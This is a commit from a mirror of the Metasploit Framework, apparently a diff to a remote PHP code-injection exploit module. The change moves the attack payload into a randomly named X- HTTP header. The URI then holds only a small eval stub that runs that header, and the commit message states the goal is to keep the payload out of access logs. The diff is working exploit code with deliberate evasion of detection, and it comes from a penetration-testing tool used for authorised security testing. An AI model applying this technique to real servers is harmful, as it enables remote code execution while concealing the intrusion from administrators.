mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-11-12 11:52:01 +01:00
move the payload into a random X- header so it doesn't show up in access logs
git-svn-id: file:///home/svn/framework3/trunk@6493 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
ba3627aa9b
commit
b31abbc6f9
@ -60,9 +60,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
# sending a socket payload
|
||||
timeout = 0.01
|
||||
|
||||
uri = datastore['URIPATH'].sub("!CODE!", Rex::Text.uri_encode(payload.encoded))
|
||||
response = send_request_raw({ 'uri' => uri },timeout)
|
||||
headername = "X-" + Rex::Text.rand_text_alpha_upper(rand(10)+10)
|
||||
stub = "eval($_SERVER['HTTP_#{headername.gsub("-", "_")}']);"
|
||||
|
||||
uri = datastore['URIPATH'].sub("!CODE!", Rex::Text.uri_encode(stub))
|
||||
response = send_request_raw({
|
||||
'uri' => uri,
|
||||
'headers' => {
|
||||
headername => payload.encoded,
|
||||
'Connection' => 'close'
|
||||
}
|
||||
},timeout)
|
||||
|
||||
handler
|
||||
end
|
||||
end
|
||||
end
|
||||
|
Loading…
Reference in New Issue
Block a user